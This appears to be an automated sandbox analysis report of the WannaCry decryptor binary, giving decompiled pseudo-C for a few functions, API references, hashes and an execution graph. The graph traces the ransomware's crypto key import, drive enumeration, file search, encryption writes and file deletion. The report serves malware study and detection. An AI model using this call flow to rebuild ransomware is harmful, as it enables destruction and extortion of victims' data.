                                  • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#2414#795
                                  • String ID:
                                  • API String ID: 932896513-0
                                  • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                  • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                  • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t18;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t40;

				_t1 =  &_a12; // 0x40276a
				_t35 = _a8;
				if(_t35 ==  *_t1) {
					_t16 =  &_a4; // 0x40276a
					_t18 =  *_t16;
					 *_t18 = _t35;
					return _t18;
				} else {
					do {
						_t37 = _t35;
						_t35 =  *_t35;
						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t30 =  *((intOrPtr*)(_t37 + 0xc));
						if(_t30 != 0) {
							_t23 =  *((intOrPtr*)(_t30 - 1));
							if(_t23 == 0 || _t23 == 0xff) {
								_push(_t30 + 0xfffffffe);
								L00412C98();
								_t40 = _t40 + 4;
							} else {
								 *((char*)(_t30 - 1)) = _t23 - 1;
							}
						}
						_push(_t37);
						 *((intOrPtr*)(_t37 + 0xc)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = 0;
						 *((intOrPtr*)(_t37 + 0x14)) = 0;
						L00412C98();
						_t40 = _t40 + 4;
						_a8 = _a8 - 1;
					} while (_t35 != _a12);
					_t22 = _a4;
					 *_t22 = _t35;
					return _t22;
				}
			}










                                  0x00402e00
                                  0x00402e06
                                  0x00402e0e
                                  0x00402e7a
                                  0x00402e7a
                                  0x00402e7e
                                  0x00402e82
                                  0x00402e10
                                  0x00402e14
                                  0x00402e14
                                  0x00402e16
                                  0x00402e1d
                                  0x00402e24
                                  0x00402e27
                                  0x00402e2c
                                  0x00402e2e
                                  0x00402e33
                                  0x00402e43
                                  0x00402e44
                                  0x00402e49
                                  0x00402e39
                                  0x00402e3b
                                  0x00402e3b
                                  0x00402e33
                                  0x00402e4c
                                  0x00402e4d
                                  0x00402e50
                                  0x00402e53
                                  0x00402e56
                                  0x00402e62
                                  0x00402e68
                                  0x00402e68
                                  0x00402e6d
                                  0x00402e73
                                  0x00402e77
                                  0x00402e77

                                  APIs
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825
                                  • String ID: j'@
                                  • API String ID: 41483190-370697233
                                  • Opcode ID: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
                                  • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                  • Opcode Fuzzy Hash: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
                                  • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407650(void* __ecx, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				if(_t3 != 0x3e9) {
					if(_t3 == 0x3ea) {
						_t3 =  *((intOrPtr*)(__ecx + 0x820));
						if(_t3 == 0) {
							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
						}
					}
					L00412CBC();
					return _t3;
				} else {
					_t4 = E004076A0(__ecx, 1);
					L00412CBC();
					return _t4;
				}
			}





                                  0x00407650
                                  0x0040765c
                                  0x00407675
                                  0x00407677
                                  0x0040767f
                                  0x00407688
                                  0x0040768d
                                  0x0040767f
                                  0x00407692
                                  0x00407698
                                  0x0040765e
                                  0x00407660
                                  0x00407667
                                  0x0040766d
                                  0x0040766d

                                  APIs
                                  • #2379.MFC42 ref: 00407692
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • #2379.MFC42(00000001), ref: 00407667
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$time
                                  • String ID: Wana Decrypt0r 2.0
                                  • API String ID: 2017816395-4201229886
                                  • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                  • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:3.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1683
                                  Total number of Limit Nodes:14
                                  execution_graph 5545 408c40 5546 408d5c 5545->5546 5548 408c97 5545->5548 5547 408c9d _ftol _ftol 5547->5548 5548->5546 5548->5547 6008 401140 #4710 SendMessageA SendMessageA #537 6013 401970 #3092 #6199 #800 6008->6013 6010 401199 SetTimer 6011 4011c3 CreateThread 6010->6011 6012 4011dd 6010->6012 6011->6012 6014 4012d0 6011->6014 6013->6010 6017 4012e0 sprintf sprintf GetFileAttributesA 6014->6017 6018 4013b0 fopen 6017->6018 6019 401350 6017->6019 6021 4012d9 6018->6021 6022 4013ef fread fclose sprintf fopen 6018->6022 6039 404640 InitializeCriticalSection 6019->6039 6022->6021 6024 401471 fread fclose sprintf fopen 6022->6024 6023 401359 6040 4047c0 6023->6040 6024->6021 6025 4014f2 fread fclose 6024->6025 6057 40be90 strncpy strncpy strncpy 6025->6057 6028 401377 6030 401395 DeleteFileA 6028->6030 6031 40137b 6028->6031 6029 401525 6058 40c240 6029->6058 6056 404690 DeleteCriticalSection 6030->6056 6101 404690 DeleteCriticalSection 6031->6101 6035 401575 6035->6021 6100 404640 InitializeCriticalSection 6035->6100 6037 40158c 6038 4047c0 16 API calls 6037->6038 6038->6031 6039->6023 6041 4046b0 CryptAcquireContextA 6040->6041 6043 40484e 6041->6043 6042 4048f3 6042->6028 6043->6042 6044 4049b0 7 API calls 6043->6044 6045 40486e 6044->6045 6046 4048e5 _local_unwind2 6045->6046 6048 4049b0 7 API calls 6045->6048 6046->6042 6049 40488a 6048->6049 6049->6046 6050 404895 CryptEncrypt 6049->6050 6050->6046 6051 404908 CryptDecrypt 6050->6051 6051->6046 6052 404932 strncmp 6051->6052 6053 404984 6052->6053 6054 40495e _local_unwind2 6052->6054 6102 4049a6 6053->6102 6054->6028 6056->6018 6057->6029 6059 40c25f 6058->6059 6060 40bed0 110 API calls 6059->6060 6061 40c29b 6060->6061 6062 40c2a2 6061->6062 6063 40c2c8 6061->6063 6064 40c2bc 6062->6064 6065 40c2ad SendMessageA 6062->6065 6066 40c2e5 6063->6066 6067 40c2d9 SendMessageA 6063->6067 6069 40dbf0 free 6064->6069 6065->6064 6068 40dc00 4 API calls 6066->6068 6067->6066 6070 40c2f8 6068->6070 6095 40c3d8 6069->6095 6071 40dc00 4 API calls 6070->6071 6072 40c313 6071->6072 6073 40dd00 4 API calls 6072->6073 6074 40c324 6073->6074 6075 40dd00 4 API calls 6074->6075 6076 40c335 6075->6076 6077 40dc00 4 API calls 6076->6077 6078 40c350 6077->6078 6079 40dc00 4 API calls 6078->6079 6080 40c36b 6079->6080 6081 40dc00 4 API calls 6080->6081 6082 40c37d 6081->6082 6083 40c3e0 6082->6083 6084 40c3a9 6082->6084 6085 40c3f0 6083->6085 6086 40c3e4 SendMessageA 6083->6086 6087 40c3b9 6084->6087 6088 40c3ad SendMessageA 6084->6088 6089 40c419 6085->6089 6090 40c44d 6085->6090 6086->6085 6091 40dbf0 free 6087->6091 6088->6087 6092 40c429 6089->6092 6093 40c41d SendMessageA 6089->6093 6094 40c49c 6090->6094 6097 40c45e fopen 6090->6097 6091->6095 6099 40dbf0 free 6092->6099 6093->6092 6094->6064 6096 40c4a0 SendMessageA 6094->6096 6095->6035 6096->6064 6097->6094 6098 40c479 fwrite fclose 6097->6098 6098->6094 6099->6095 6100->6037 6101->6021 6103 404770 3 API calls 6102->6103 6104 4049ad 6103->6104 6104->6042 6228 409a40 6232 409d40 6228->6232 6231 409ae7 #2414 #2414 6233 409a87 OffsetRect CreateRectRgn #1641 #5781 6232->6233 6233->6231 6471 409f40 PtVisible 6472 40cf40 6480 40d300 6472->6480 6474 40cf61 6475 40d300 6 API calls 6474->6475 6476 40cf66 6474->6476 6477 40cf87 6475->6477 6478 40d300 6 API calls 6477->6478 6479 40cf8c 6477->6479 6478->6479 6481 40d31f 6480->6481 6482 40d32e 6480->6482 6481->6474 6483 40d339 6482->6483 6484 40d373 time 6482->6484 6486 40d363 6482->6486 6487 40d378 6482->6487 6483->6474 6488 40d493 6484->6488 6489 40d41e 6484->6489 6502 40d2b0 6486->6502 6491 40d3b0 6487->6491 6492 40d380 6487->6492 6493 40d4b1 6488->6493 6498 40d4a8 free 6488->6498 6489->6488 6500 40d487 time 6489->6500 6501 40d469 Sleep 6489->6501 6506 412a90 malloc 6491->6506 6494 40d2b0 memmove 6492->6494 6493->6474 6494->6484 6496 40d3b6 6497 40d3c1 6496->6497 6499 40d2b0 memmove 6496->6499 6497->6474 6498->6493 6499->6484 6500->6488 6500->6489 6501->6489 6503 40d2f5 6502->6503 6504 40d2be 6502->6504 6503->6484 6505 40d2c3 memmove 6504->6505 6505->6503 6505->6505 6506->6496 5549 404050 #616 5550 404068 5549->5550 5551 40405f #825 5549->5551 5551->5550 6105 404150 6110 404170 #2414 #800 #800 #795 6105->6110 6107 404158 6108 404168 6107->6108 6109 40415f #825 6107->6109 6109->6108 6110->6107 6234 403250 6235 403261 #825 6234->6235 6236 40326a 6234->6236 6235->6236 6237 407650 6238 40765e 6237->6238 6241 407670 6237->6241 6239 4076a0 20 API calls 6238->6239 6242 407665 #2379 6239->6242 6240 407690 #2379 6241->6240 6243 40b620 9 API calls 6241->6243 6244 40768d 6243->6244 6244->6240 6245 413254 _exit 6111 413556 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5417 405a60 5464 40b620 FindWindowW 5417->5464 5421 405aab #2514 5487 403f20 #2414 5421->5487 5423 405ae9 5488 403f20 #2414 5423->5488 5425 405b04 5489 403f20 #2414 5425->5489 5427 405b1f 5490 403f20 #2414 5427->5490 5429 405b3f 5491 403f20 #2414 5429->5491 5431 405b5a 5492 403f20 #2414 5431->5492 5433 405b75 5493 403f20 #2414 5433->5493 5435 405b90 5494 403f20 #2414 5435->5494 5437 405bab 5495 403f20 #2414 5437->5495 5439 405bc6 5496 403f20 #2414 5439->5496 5441 405be1 5497 403f20 #2414 5441->5497 5443 405bfc 5498 403f90 #2414 5443->5498 5445 405c10 5499 403f90 #2414 5445->5499 5447 405c24 #800 #800 #800 #800 #781 5500 4050a0 #800 #795 5447->5500 5449 405c9c 5501 4050a0 #800 #795 5449->5501 5451 405cb0 5502 404170 #2414 #800 #800 #795 5451->5502 5453 405cc4 5503 404170 #2414 #800 #800 #795 5453->5503 5455 405cd8 5504 404170 #2414 #800 #800 #795 5455->5504 5457 405cec 5505 404170 #2414 #800 #800 #795 5457->5505 5459 405d00 5506 405d90 #654 #765 5459->5506 5461 405d14 5507 405d90 #654 #765 5461->5507 5463 405d28 #609 #609 #616 #641 5465 40b634 7 API calls 5464->5465 5466 405a8a #1134 #2621 #6438 5464->5466 5465->5466 5467 40b687 ExitProcess 5465->5467 5468 4060e0 #324 #567 #567 #567 5466->5468 5508 4085c0 7 API calls 5468->5508 5470 406162 5471 4085c0 9 API calls 5470->5471 5472 406172 5471->5472 5512 404090 7 API calls 5472->5512 5474 406182 5513 404090 7 API calls 5474->5513 5476 406192 5514 404090 7 API calls 5476->5514 5478 4061a2 5515 404090 7 API calls 5478->5515 5480 4061b2 5516 405000 #567 #540 5480->5516 5482 4061c2 5483 405000 2 API calls 5482->5483 5484 4061d2 #567 #540 #540 #540 #540 5483->5484 5518 407640 5484->5518 5486 4062cb 7 API calls 5486->5421 5487->5423 5488->5425 5489->5427 5490->5429 5491->5431 5492->5433 5493->5435 5494->5437 5495->5439 5496->5441 5497->5443 5498->5445 5499->5447 5500->5449 5501->5451 5502->5453 5503->5455 5504->5457 5505->5459 5506->5461 5507->5463 5509 408660 #6140 5508->5509 5510 408654 5508->5510 5509->5470 5510->5509 5511 40865a GetSysColor 5510->5511 5511->5509 5512->5474 5513->5476 5514->5478 5515->5480 5517 40504a 5516->5517 5517->5482 5518->5486 5552 403860 SendMessageA 5553 403892 SendMessageA 5552->5553 5554 403883 #1200 5552->5554 5555 4038d1 5553->5555 5556 4038a5 SendMessageA CreateThread 5553->5556 5556->5555 5557 4038e0 5556->5557 5560 4038f0 5557->5560 5559 4038e9 5579 403eb0 6 API calls 5560->5579 5562 403916 SendMessageA 5563 4039e1 5562->5563 5564 403937 SendMessageA 5562->5564 5626 403eb0 6 API calls 5563->5626 5565 403951 5564->5565 5566 403958 5564->5566 5580 403af0 fopen 5565->5580 5597 401e90 5566->5597 5569 4039ea CloseHandle 5569->5559 5571 403961 sprintf 5602 402020 5571->5602 5573 403998 5574 40399c 5573->5574 5611 403a20 5573->5611 5575 4039cd 5574->5575 5578 4039c8 #1200 5574->5578 5619 401f30 5575->5619 5578->5575 5579->5562 5581 403b41 5580->5581 5582 403b28 5580->5582 5583 401e90 InitializeCriticalSection 5581->5583 5582->5566 5584 403b4d 5583->5584 5585 402020 14 API calls 5584->5585 5586 403b67 5585->5586 5587 403b6b 5586->5587 5595 403b9b 5586->5595 5588 401f30 6 API calls 5587->5588 5590 403b82 5588->5590 5589 403c61 fclose 5591 401f30 6 API calls 5589->5591 5590->5566 5593 403c8f 5591->5593 5592 403bb2 fgets 5594 403c5f 5592->5594 5592->5595 5593->5566 5594->5589 5595->5589 5595->5592 5595->5594 5627 402650 MultiByteToWideChar 5595->5627 5719 404640 InitializeCriticalSection 5597->5719 5599 401eb6 5720 404640 InitializeCriticalSection 5599->5720 5601 401ec4 5601->5571 5721 4046f0 5602->5721 5604 402031 5605 402035 5604->5605 5606 402048 GlobalAlloc 5604->5606 5607 4046f0 12 API calls 5604->5607 5605->5573 5608 402061 5606->5608 5609 402066 GlobalAlloc 5606->5609 5607->5606 5608->5573 5610 402079 5609->5610 5610->5573 5612 403a32 GetLogicalDrives 5611->5612 5613 403adc 5611->5613 5617 403a48 5612->5617 5613->5574 5614 403a53 GetDriveTypeW 5615 403a81 GetDiskFreeSpaceExW 5614->5615 5614->5617 5615->5617 5616 403ace 5616->5574 5617->5614 5617->5616 5759 4026b0 5617->5759 5849 401fa0 5619->5849 5621 401f60 5858 404690 DeleteCriticalSection 5621->5858 5623 401f7a 5859 404690 DeleteCriticalSection 5623->5859 5625 401f8a 5625->5563 5626->5569 5630 402560 wcscpy wcsrchr 5627->5630 5629 40269a 5629->5595 5631 4025c9 wcscat 5630->5631 5632 402599 _wcsicmp 5630->5632 5633 4025bd 5631->5633 5632->5633 5634 4025ae _wcsicmp 5632->5634 5643 4020a0 CreateFileW 5633->5643 5634->5631 5634->5633 5636 4025eb 5637 402629 DeleteFileW 5636->5637 5638 4025ef DeleteFileW 5636->5638 5639 402634 5637->5639 5638->5639 5640 4025fa 5638->5640 5639->5629 5641 402617 5640->5641 5642 4025fe MoveFileW 5640->5642 5641->5629 5642->5629 5644 402143 GetFileTime ReadFile 5643->5644 5662 402139 _local_unwind2 5643->5662 5646 40217c 5644->5646 5644->5662 5647 402196 ReadFile 5646->5647 5646->5662 5648 4021b3 5647->5648 5647->5662 5649 4021c3 ReadFile 5648->5649 5648->5662 5650 4021ea ReadFile 5649->5650 5649->5662 5651 402208 ReadFile 5650->5651 5650->5662 5652 402226 5651->5652 5651->5662 5653 402233 CloseHandle CreateFileW 5652->5653 5654 4022f9 CreateFileW 5652->5654 5656 402264 SetFilePointer ReadFile 5653->5656 5653->5662 5655 40232c 5654->5655 5654->5662 5676 404af0 5655->5676 5658 402297 5656->5658 5656->5662 5660 4022a4 SetFilePointer WriteFile 5658->5660 5658->5662 5659 40234d 5661 402372 5659->5661 5665 404af0 4 API calls 5659->5665 5660->5662 5663 4022ce 5660->5663 5661->5662 5681 40a150 5661->5681 5662->5636 5663->5662 5664 4022db SetFilePointer SetEndOfFile 5663->5664 5667 402497 SetFileTime 5664->5667 5665->5661 5668 4024e0 _local_unwind2 5667->5668 5669 4024bc CloseHandle MoveFileW 5667->5669 5668->5636 5669->5668 5671 402477 SetFilePointerEx SetEndOfFile 5671->5667 5672 4023e0 ReadFile 5672->5662 5673 4023a7 5672->5673 5673->5662 5673->5671 5673->5672 5688 40b3c0 5673->5688 5677 404b04 EnterCriticalSection CryptDecrypt 5676->5677 5678 404afc 5676->5678 5679 404b3b LeaveCriticalSection 5677->5679 5680 404b2d LeaveCriticalSection 5677->5680 5678->5659 5679->5659 5680->5659 5682 40a184 5681->5682 5683 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 5681->5683 5684 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 5682->5684 5685 40a1bd 5682->5685 5683->5682 5684->5685 5686 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 5685->5686 5687 40a1f6 5685->5687 5686->5687 5687->5673 5689 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 5688->5689 5690 40b3ee 5688->5690 5689->5690 5691 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 5690->5691 5699 40b410 5690->5699 5692 40b5ba 5694 40b0c0 4 API calls 5692->5694 5700 402424 WriteFile 5692->5700 5694->5692 5696 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 5698 40b4ed 5696->5698 5697 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 5697->5692 5698->5692 5698->5697 5698->5700 5707 40adc0 5698->5707 5699->5696 5699->5698 5699->5699 5699->5700 5701 40b0c0 5699->5701 5700->5662 5700->5673 5702 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 5701->5702 5703 40b0ee 5701->5703 5702->5703 5706 40b114 5703->5706 5713 40a9d0 5703->5713 5706->5699 5708 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 5707->5708 5709 40adee 5707->5709 5708->5709 5710 40ae14 5709->5710 5716 40a610 5709->5716 5710->5698 5714 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 5713->5714 5715 40a9ff 5713->5715 5714->5715 5715->5699 5717 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 5716->5717 5718 40a63f 5716->5718 5717->5718 5718->5698 5719->5599 5720->5601 5738 4046b0 5721->5738 5723 4046f8 5724 404709 5723->5724 5725 4046fc 5723->5725 5727 404711 CryptImportKey 5724->5727 5728 40473e 5724->5728 5743 404770 5725->5743 5731 404760 5727->5731 5732 404731 5727->5732 5750 4049b0 CreateFileA 5728->5750 5731->5604 5733 404770 3 API calls 5732->5733 5735 404738 5733->5735 5734 40474c 5734->5731 5736 404770 3 API calls 5734->5736 5735->5604 5737 40475a 5736->5737 5737->5604 5739 4046b7 CryptAcquireContextA 5738->5739 5740 4046e0 5739->5740 5741 4046d7 5739->5741 5740->5723 5741->5739 5742 4046dd 5741->5742 5742->5723 5744 404788 5743->5744 5745 40477a CryptDestroyKey 5743->5745 5746 40479d 5744->5746 5747 40478f CryptDestroyKey 5744->5747 5745->5744 5748 404703 5746->5748 5749 4047a4 CryptReleaseContext 5746->5749 5747->5746 5748->5604 5749->5748 5751 404a1b _local_unwind2 5750->5751 5752 404a09 GetFileSize 5750->5752 5751->5734 5752->5751 5753 404a25 5752->5753 5753->5751 5755 404a38 GlobalAlloc 5753->5755 5755->5751 5756 404a49 ReadFile 5755->5756 5756->5751 5757 404a64 CryptImportKey 5756->5757 5757->5751 5758 404a81 _local_unwind2 5757->5758 5758->5734 5760 40c8f0 #823 5759->5760 5761 4026e4 5760->5761 5762 40c8f0 #823 5761->5762 5763 402706 swprintf FindFirstFileW 5762->5763 5764 40274d 5763->5764 5778 4027b4 5763->5778 5798 402e00 5764->5798 5766 40276a #825 5768 402e00 2 API calls 5766->5768 5767 4027d4 wcscmp 5770 40295d FindNextFileW 5767->5770 5771 4027ee wcscmp 5767->5771 5772 4027a0 #825 5768->5772 5769 402978 FindClose 5776 40298d 5769->5776 5780 4029b9 5769->5780 5770->5769 5770->5778 5771->5770 5773 402808 swprintf GetFileAttributesW 5771->5773 5775 402ace 5772->5775 5777 4028b6 wcscmp 5773->5777 5773->5778 5774 4029ef swprintf DeleteFileW swprintf DeleteFileW 5781 402a6a #825 5774->5781 5782 402a4f 5774->5782 5775->5617 5776->5780 5788 402560 59 API calls 5776->5788 5777->5770 5779 4028d0 wcscmp 5777->5779 5778->5767 5778->5769 5778->5770 5791 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5778->5791 5804 402af0 _wcsnicmp 5778->5804 5779->5770 5784 4028e6 wcscmp 5779->5784 5780->5774 5790 4026b0 84 API calls 5780->5790 5786 402a94 5781->5786 5787 402aba #825 5781->5787 5793 402a66 5782->5793 5830 402e90 5782->5830 5784->5770 5789 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5784->5789 5786->5787 5795 402e90 2 API calls 5786->5795 5787->5775 5788->5776 5792 402da0 8 API calls 5789->5792 5790->5780 5826 402da0 #823 5791->5826 5796 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5792->5796 5793->5781 5795->5786 5796->5770 5799 402e7a 5798->5799 5803 402e10 5798->5803 5799->5766 5800 402e4c #825 5801 402e6d 5800->5801 5800->5803 5801->5766 5802 402e40 #825 5802->5800 5803->5800 5803->5802 5805 402b12 wcsstr 5804->5805 5806 402b1f 5804->5806 5805->5806 5807 402b30 _wcsicmp 5806->5807 5808 402be9 _wcsicmp 5806->5808 5811 402b42 5807->5811 5812 402b4d _wcsicmp 5807->5812 5809 402c07 _wcsicmp 5808->5809 5810 402bfc 5808->5810 5813 402c21 _wcsicmp 5809->5813 5814 402c16 5809->5814 5810->5778 5811->5778 5815 402b67 _wcsicmp 5812->5815 5816 402b5c 5812->5816 5813->5778 5814->5778 5817 402b81 _wcsicmp 5815->5817 5818 402b76 5815->5818 5816->5778 5819 402b90 5817->5819 5820 402b9b _wcsicmp 5817->5820 5818->5778 5819->5778 5821 402bb5 wcsstr 5820->5821 5822 402baa 5820->5822 5823 402bc4 5821->5823 5824 402bcf wcsstr 5821->5824 5822->5778 5823->5778 5824->5808 5825 402bde 5824->5825 5825->5778 5827 402dbf 5826->5827 5835 402f10 5827->5835 5829 402de4 5829->5796 5831 402ed0 #825 5830->5831 5832 402eb1 5830->5832 5831->5782 5833 402ec4 #825 5832->5833 5834 402ebd 5832->5834 5833->5831 5834->5831 5836 402f40 5835->5836 5843 403044 5835->5843 5837 402f68 5836->5837 5842 402fdb 5836->5842 5839 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5837->5839 5840 402f6e ?_Xran@std@ 5837->5840 5838 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5838->5843 5844 402f85 5839->5844 5840->5839 5841 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5841->5829 5842->5838 5845 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5842->5845 5843->5829 5844->5841 5846 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5844->5846 5847 403006 5845->5847 5846->5841 5848 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 5846->5848 5847->5829 5848->5841 5850 404770 3 API calls 5849->5850 5851 401fac 5850->5851 5852 404770 3 API calls 5851->5852 5853 401fb4 5852->5853 5853->5853 5855 401fe3 5853->5855 5856 401fd0 GlobalFree 5853->5856 5854 40200c 5854->5621 5855->5854 5857 401ff9 GlobalFree 5855->5857 5856->5855 5857->5854 5858->5623 5859->5625 6112 403560 6113 40358c #4376 6112->6113 6114 40356e GetExitCodeThread 6112->6114 6115 403593 6113->6115 6114->6113 6114->6115 6510 40db60 send 6511 409f60 RectVisible 6512 401760 #6453 6513 401791 WaitForSingleObject TerminateThread CloseHandle 6512->6513 6514 4017b8 6512->6514 6513->6514 6515 40193e 6514->6515 6516 4018f6 6514->6516 6517 4017d8 sprintf fopen 6514->6517 6518 401915 6516->6518 6521 401903 rand 6516->6521 6519 401834 8 API calls 6517->6519 6520 4018da #1200 6517->6520 6518->6515 6522 401939 #1200 6518->6522 6519->6515 6520->6515 6521->6518 6522->6515 5860 40a070 DrawTextA 5861 404070 #693 5862 404088 5861->5862 5863 40407f #825 5861->5863 5863->5862 6117 408d70 6118 408e09 GetDeviceCaps 6117->6118 6120 408eb0 6118->6120 6126 408ed8 6118->6126 6121 408eba GetDeviceCaps GetDeviceCaps 6120->6121 6120->6126 6121->6126 6122 4090b6 #2414 6123 408f51 _ftol _ftol 6123->6126 6124 408fca _ftol _ftol _ftol 6125 409024 CreateSolidBrush #1641 6124->6125 6124->6126 6125->6126 6126->6122 6126->6123 6126->6124 6127 409048 FillRect #2414 6126->6127 6128 409083 #2754 6126->6128 6127->6126 6128->6126 6246 404670 6251 404690 DeleteCriticalSection 6246->6251 6248 404678 6249 404688 6248->6249 6250 40467f #825 6248->6250 6250->6249 6251->6248 6523 409b70 #2379 6530 403f70 6535 403f90 #2414 6530->6535 6532 403f78 6533 403f88 6532->6533 6534 403f7f #825 6532->6534 6534->6533 6535->6532 6536 404f70 #4476 6537 404f91 6536->6537 6538 404fc7 #3089 6536->6538 6537->6538 6539 404f9b 6537->6539 6252 403271 #2302 #2302 6253 406a00 #4476 6254 406a23 6253->6254 6256 406a62 6253->6256 6255 406a38 #3089 6254->6255 6254->6256 6255->6256 6257 406a46 #3089 6255->6257 6257->6256 